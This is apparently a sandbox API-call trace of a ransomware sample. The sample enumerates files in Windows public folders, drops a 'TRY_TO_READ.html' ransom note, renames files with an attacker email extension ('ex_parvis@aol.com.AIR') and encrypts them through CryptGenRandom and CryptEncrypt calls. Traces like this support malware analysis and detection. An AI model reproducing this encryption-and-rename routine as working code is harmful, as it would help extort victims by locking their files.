	[0100.862] FindNextFileW (in: hFindFile=0x5daa70, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca84b130, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xca84b130, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6c90530, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0100.862] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0100.862] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0100.862] SetFileAttributesW (lpFileName="C:\\\\Users\\Public\\Pictures\\desktop.ini", dwFileAttributes=0x80) returned 1
	[0100.862] lstrlenW (lpString="C:\\\\Users\\Public\\Pictures\\desktop.ini") returned 37
	[0100.862] GetProcessHeap () returned 0x540000
	[0100.862] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xb0) returned 0x599528
	[0100.862] lstrcpyW (in: lpString1=0x599528, lpString2="C:\\\\Users\\Public\\Pictures\\desktop.ini" | out: lpString1="C:\\\\Users\\Public\\Pictures\\desktop.ini") returned="C:\\\\Users\\Public\\Pictures\\desktop.ini"
	[0100.862] lstrcatW (in: lpString1="C:\\\\Users\\Public\\Pictures\\desktop.ini", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\Public\\Pictures\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\Public\\Pictures\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR"
	[0100.862] MoveFileExW (lpExistingFileName="C:\\\\Users\\Public\\Pictures\\desktop.ini" (normalized: "c:\\users\\public\\pictures\\desktop.ini"), lpNewFileName="C:\\\\Users\\Public\\Pictures\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\pictures\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0100.866] CreateFileW (lpFileName="C:\\\\Users\\Public\\Pictures\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\pictures\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4ec
	[0100.866] GetProcessHeap () returned 0x540000
	[0100.866] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x599528 | out: hHeap=0x540000) returned 1
	[0100.866] GetFileSizeEx (in: hFile=0x4ec, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=380) returned 1
	[0100.866] SetFilePointer (in: hFile=0x4ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x17c
	[0100.866] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0100.867] GetProcessHeap () returned 0x540000
	[0100.867] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0100.867] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0100.867] WriteFile (in: hFile=0x4ec, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0100.867] WriteFile (in: hFile=0x4ec, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0100.868] WriteFile (in: hFile=0x4ec, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0100.868] ReadFile (in: hFile=0x4ec, lpBuffer=0x597dc8, nNumberOfBytesToRead=0x17c, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x597dc8*, lpNumberOfBytesRead=0x3a1f778*=0x17c, lpOverlapped=0x0) returned 1
	[0100.868] SetFilePointer (in: hFile=0x4ec, lDistanceToMove=-380, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0100.868] WriteFile (in: hFile=0x4ec, lpBuffer=0x56b448*, nNumberOfBytesToWrite=0x17c, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x56b448*, lpNumberOfBytesWritten=0x3a1f778*=0x17c, lpOverlapped=0x0) returned 1
	[0100.868] FindFirstFileW (in: lpFileName="C:\\\\Users\\Public\\Recorded TV\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xca84b130, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca84b130, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5daab0
	[0100.868] FindNextFileW (in: hFindFile=0x5daab0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xca84b130, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca84b130, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0100.868] FindNextFileW (in: hFindFile=0x5daab0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x89e5e11e, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x89e5e11e, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0100.868] FindNextFileW (in: hFindFile=0x5daab0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sample Media", cAlternateFileName="SAMPLE~1")) returned 1
	[0100.869] CreateFileW (lpFileName="C:\\\\Users\\Public\\Recorded TV\\Sample Media\\TRY_TO_READ.html" (normalized: "c:\\users\\public\\recorded tv\\sample media\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4f0
	[0100.871] FindNextFileW (in: hFindFile=0x5daab0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca84b130, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xca84b130, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca84b130, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0100.871] FindNextFileW (in: hFindFile=0x5daab0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca84b130, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xca84b130, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca84b130, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0100.871] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0100.871] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0100.871] SetFileAttributesW (lpFileName="C:\\\\Users\\Public\\Recorded TV\\desktop.ini", dwFileAttributes=0x80) returned 1
	[0100.872] lstrlenW (lpString="C:\\\\Users\\Public\\Recorded TV\\desktop.ini") returned 40
	[0100.872] GetProcessHeap () returned 0x540000
	[0100.872] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xb6) returned 0x5a2048
	[0100.872] lstrcpyW (in: lpString1=0x5a2048, lpString2="C:\\\\Users\\Public\\Recorded TV\\desktop.ini" | out: lpString1="C:\\\\Users\\Public\\Recorded TV\\desktop.ini") returned="C:\\\\Users\\Public\\Recorded TV\\desktop.ini"
	[0100.872] lstrcatW (in: lpString1="C:\\\\Users\\Public\\Recorded TV\\desktop.ini", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\Public\\Recorded TV\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\Public\\Recorded TV\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR"
	[0100.872] MoveFileExW (lpExistingFileName="C:\\\\Users\\Public\\Recorded TV\\desktop.ini" (normalized: "c:\\users\\public\\recorded tv\\desktop.ini"), lpNewFileName="C:\\\\Users\\Public\\Recorded TV\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\recorded tv\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0100.877] CreateFileW (lpFileName="C:\\\\Users\\Public\\Recorded TV\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\recorded tv\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4f0
	[0100.877] GetProcessHeap () returned 0x540000
	[0100.877] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a2048 | out: hHeap=0x540000) returned 1
	[0100.877] GetFileSizeEx (in: hFile=0x4f0, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=80) returned 1
	[0100.877] SetFilePointer (in: hFile=0x4f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x50
	[0100.877] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0100.877] GetProcessHeap () returned 0x540000
	[0100.877] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0100.877] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0100.877] WriteFile (in: hFile=0x4f0, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0100.878] WriteFile (in: hFile=0x4f0, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0100.878] WriteFile (in: hFile=0x4f0, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0100.879] ReadFile (in: hFile=0x4f0, lpBuffer=0x58bba8, nNumberOfBytesToRead=0x50, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x58bba8*, lpNumberOfBytesRead=0x3a1f778*=0x50, lpOverlapped=0x0) returned 1
	[0100.879] SetFilePointer (in: hFile=0x4f0, lDistanceToMove=-80, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0100.879] WriteFile (in: hFile=0x4f0, lpBuffer=0x58b9f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x58b9f0*, lpNumberOfBytesWritten=0x3a1f778*=0x50, lpOverlapped=0x0) returned 1
	[0100.879] FindFirstFileW (in: lpFileName="C:\\\\Users\\Public\\Videos\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xca84b130, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca84b130, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5daaf0
	[0100.879] FindNextFileW (in: hFindFile=0x5daaf0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xca84b130, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca84b130, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0100.879] FindNextFileW (in: hFindFile=0x5daaf0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x282dfaee, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28886f39, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0100.879] FindNextFileW (in: hFindFile=0x5daaf0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x802f4656, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sample Videos", cAlternateFileName="SAMPLE~1")) returned 1
	[0100.879] CreateFileW (lpFileName="C:\\\\Users\\Public\\Videos\\Sample Videos\\TRY_TO_READ.html" (normalized: "c:\\users\\public\\videos\\sample videos\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4f4
	[0100.880] FindNextFileW (in: hFindFile=0x5daaf0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca84b130, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xca84b130, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6c90530, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0100.880] FindNextFileW (in: hFindFile=0x5daaf0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca84b130, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xca84b130, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6c90530, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0100.880] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0100.881] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0100.881] SetFileAttributesW (lpFileName="C:\\\\Users\\Public\\Videos\\desktop.ini", dwFileAttributes=0x80) returned 1
	[0100.881] lstrlenW (lpString="C:\\\\Users\\Public\\Videos\\desktop.ini") returned 35
	[0100.881] GetProcessHeap () returned 0x540000
	[0100.881] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xac) returned 0x599528
	[0100.881] lstrcpyW (in: lpString1=0x599528, lpString2="C:\\\\Users\\Public\\Videos\\desktop.ini" | out: lpString1="C:\\\\Users\\Public\\Videos\\desktop.ini") returned="C:\\\\Users\\Public\\Videos\\desktop.ini"
	[0100.881] lstrcatW (in: lpString1="C:\\\\Users\\Public\\Videos\\desktop.ini", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\Public\\Videos\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\Public\\Videos\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR"
	[0100.881] MoveFileExW (lpExistingFileName="C:\\\\Users\\Public\\Videos\\desktop.ini" (normalized: "c:\\users\\public\\videos\\desktop.ini"), lpNewFileName="C:\\\\Users\\Public\\Videos\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\videos\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0100.883] CreateFileW (lpFileName="C:\\\\Users\\Public\\Videos\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\videos\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4f4
	[0100.883] GetProcessHeap () returned 0x540000
	[0100.883] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x599528 | out: hHeap=0x540000) returned 1
	[0100.883] GetFileSizeEx (in: hFile=0x4f4, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=380) returned 1
	[0100.883] SetFilePointer (in: hFile=0x4f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x17c
	[0100.883] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0100.883] GetProcessHeap () returned 0x540000
	[0100.883] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0100.883] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0100.883] WriteFile (in: hFile=0x4f4, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0100.884] WriteFile (in: hFile=0x4f4, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0100.884] WriteFile (in: hFile=0x4f4, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0100.885] ReadFile (in: hFile=0x4f4, lpBuffer=0x56b448, nNumberOfBytesToRead=0x17c, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x56b448*, lpNumberOfBytesRead=0x3a1f778*=0x17c, lpOverlapped=0x0) returned 1
	[0100.885] SetFilePointer (in: hFile=0x4f4, lDistanceToMove=-380, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0100.885] WriteFile (in: hFile=0x4f4, lpBuffer=0x597dc8*, nNumberOfBytesToWrite=0x17c, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x597dc8*, lpNumberOfBytesWritten=0x3a1f778*=0x17c, lpOverlapped=0x0) returned 1
	[0100.885] FindFirstFileW (in: lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf01c0310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xd7951d10, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xd7951d10, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dab30
	[0100.885] FindNextFileW (in: hFindFile=0x5dab30, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf01c0310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xd7951d10, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xd7951d10, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0100.885] FindNextFileW (in: hFindFile=0x5dab30, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x219b4a00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x219b4a00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xf07b1ad0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xaf35ed, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Proof.cab", cAlternateFileName="")) returned 1
	[0100.885] FindNextFileW (in: hFindFile=0x5dab30, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4db6cb00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x4db6cb00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xf020c5d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd5c00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Proof.msi", cAlternateFileName="")) returned 1
	[0100.885] FindNextFileW (in: hFindFile=0x5dab30, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa38b7300, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0xa38b7300, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xf01be3d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x543, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Proof.xml", cAlternateFileName="")) returned 1
	[0100.885] FindNextFileW (in: hFindFile=0x5dab30, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd7951d10, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xd7951d10, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xd7951d10, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0100.885] FindNextFileW (in: hFindFile=0x5dab30, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd7951d10, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xd7951d10, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xd7951d10, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0100.885] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0100.885] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0100.885] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml", dwFileAttributes=0x80) returned 1
